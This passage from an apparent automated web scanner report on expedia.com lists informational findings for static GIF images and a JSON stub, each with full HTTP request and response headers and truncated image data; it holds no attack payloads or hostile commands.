Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"627-1317085594180"
Last-Modified: Tue, 27 Sep 2011 01:06:34 GMT
Content-Length: 627
Date: Mon, 03 Oct 2011 00:10:41 GMT
Connection: close

GIF89a.....Z....T}.T}................W..................................................................................................................................................................
...[SNIP]...

29.12. http://www.expedia.com/static/default/default/images/eta/sp_logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/eta/sp_logo.gif

Request

GET /static/default/default/images/eta/sp_logo.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"5596-1317085626622"
Last-Modified: Tue, 27 Sep 2011 01:07:06 GMT
Content-Length: 5596
Date: Mon, 03 Oct 2011 00:09:36 GMT
Connection: close

GIF89a........}.....^..f..Av.^..i..a..{.`.. Ns.t..N......D.j.......p.W.$U.0d.m}.....a....n..P.P.Z`.\....S..L....h.P|[..C....:p.8n..2.\..z..t..p}..<....<r.r...7.{.`._ ...y..p...2km4Pt.....{.....}..v.@
...[SNIP]...

29.13. http://www.expedia.com/static/default/default/images/eta/stampa.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/eta/stampa.gif

Request

GET /static/default/default/images/eta/stampa.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1125-1317085621705"
Last-Modified: Tue, 27 Sep 2011 01:07:01 GMT
Content-Length: 1125
Date: Mon, 03 Oct 2011 00:09:36 GMT
Connection: close

GIF89aR.
....1-....#. aM4.c.$#&s]<..;\H(MIJ.....D.g2.h?lT.....f...A..........................................!..NETSCAPE2.0.....!.......,....R.
........ ....l..p,.....A.E.>...p..DcpX.-.Nd..0 ..f...z.
...[SNIP]...

29.14. http://www.expedia.com/static/default/default/images/hotel-sprite.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/hotel-sprite.gif

Request

GET /static/default/default/images/hotel-sprite.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"22991-1317085621866"
Last-Modified: Tue, 27 Sep 2011 01:07:01 GMT
Content-Length: 22991
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

GIF89a*.&....)........r..M.."w.$z.......W..M........F..7v.5......................3..............2..3.............5_..............E....q....................f.%~.....n.....Oy............................
...[SNIP]...

29.15. http://www.expedia.com/static/default/default/images/infosite/bg_button_b.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/bg_button_b.gif

Request

GET /static/default/default/images/infosite/bg_button_b.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1127-1317085582989"
Last-Modified: Tue, 27 Sep 2011 01:06:22 GMT
Content-Length: 1127
Date: Mon, 03 Oct 2011 00:13:12 GMT
Connection: close

GIF89a........f..........!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
...[SNIP]...

29.16. http://www.expedia.com/static/default/default/images/infosite/bg_button_span_b.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/bg_button_span_b.gif

Request

GET /static/default/default/images/infosite/bg_button_span_b.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1216-1317085591679"
Last-Modified: Tue, 27 Sep 2011 01:06:31 GMT
Content-Length: 1216
Date: Mon, 03 Oct 2011 00:13:11 GMT
Connection: close

GIF89a........f..........!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
...[SNIP]...

29.17. http://www.expedia.com/static/default/default/images/infosite/button_beak_b.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/button_beak_b.gif

Request

GET /static/default/default/images/infosite/button_beak_b.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1184-1317085588075"
Last-Modified: Tue, 27 Sep 2011 01:06:28 GMT
Content-Length: 1184
Date: Mon, 03 Oct 2011 00:13:12 GMT
Connection: close

GIF89a...........f.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
...[SNIP]...

29.18. http://www.expedia.com/static/default/default/images/infosite/hotel_detail_rating_bar.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/hotel_detail_rating_bar.gif

Request

GET /static/default/default/images/infosite/hotel_detail_rating_bar.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"448-1317085626716"
Last-Modified: Tue, 27 Sep 2011 01:07:06 GMT
Content-Length: 448
Date: Mon, 03 Oct 2011 00:13:11 GMT
Connection: close

GIF89a:..............'.....
..........._..r..9..L....._..L..9..s........    ..r..8..K..8..K..`..&..s.....`......!.......,....:......` .di.h..@..p,.t.@.Kz/....'..
?!...-.8C.@.R..t;.^#[..J.^..[.0.p..6...
...[SNIP]...

29.19. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_down.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/icn_quote_beak_down.gif

Request

GET /static/default/default/images/infosite/icn_quote_beak_down.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1185-1317085585700"
Last-Modified: Tue, 27 Sep 2011 01:06:25 GMT
Content-Length: 1185
Date: Mon, 03 Oct 2011 00:13:09 GMT
Connection: close

GIF89aG.:..?...k........P..`..@..............#.........................;.....,..F........6..[..z..u..V..U..'..............[..F......................................1.....p..K..f.....e..J..(..K..f..e.
...[SNIP]...

29.20. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_up.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/icn_quote_beak_up.gif

Request

GET /static/default/default/images/infosite/icn_quote_beak_up.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1182-1317085617344"
Last-Modified: Tue, 27 Sep 2011 01:06:57 GMT
Content-Length: 1182
Date: Mon, 03 Oct 2011 00:13:14 GMT
Connection: close

GIF89aG.:..?...k........P..`..@..............#.........................;.....,..F........6..[..z..u..V..U..'..............[..F......................................1.....p..K..f.....e..J..(..K..f..e.
...[SNIP]...

29.21. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/rating_bar.gif

Request

GET /static/default/default/images/infosite/rating_bar.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1348-1317080324131"
Last-Modified: Mon, 26 Sep 2011 23:38:44 GMT
Content-Length: 1348
Date: Mon, 03 Oct 2011 00:13:11 GMT
Connection: close

GIF89ab........9..L.._.._..r..L...........
..'...............!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61
...[SNIP]...

29.22. http://www.expedia.com/static/default/default/images/infosite/rooms_left_middle.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/rooms_left_middle.gif

Request

GET /static/default/default/images/infosite/rooms_left_middle.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1096-1317080311412"
Last-Modified: Mon, 26 Sep 2011 23:38:31 GMT
Content-Length: 1096
Date: Mon, 03 Oct 2011 00:13:14 GMT
Connection: close

GIF89a........f....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rd
...[SNIP]...

29.23. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/videoPlayLarge.gif

Request

GET /static/default/default/images/infosite/videoPlayLarge.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1275-1317085617344"
Last-Modified: Tue, 27 Sep 2011 01:06:57 GMT
Content-Length: 1275
Date: Mon, 03 Oct 2011 00:13:01 GMT
Connection: close

GIF89a-.-......i.f.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
...[SNIP]...

29.24. http://www.expedia.com/static/default/default/stubs/adserver.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/stubs/adserver.json

Request

GET /static/default/default/stubs/adserver.json HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"51-1317080322800"
Last-Modified: Mon, 26 Sep 2011 23:38:42 GMT
Content-Length: 51
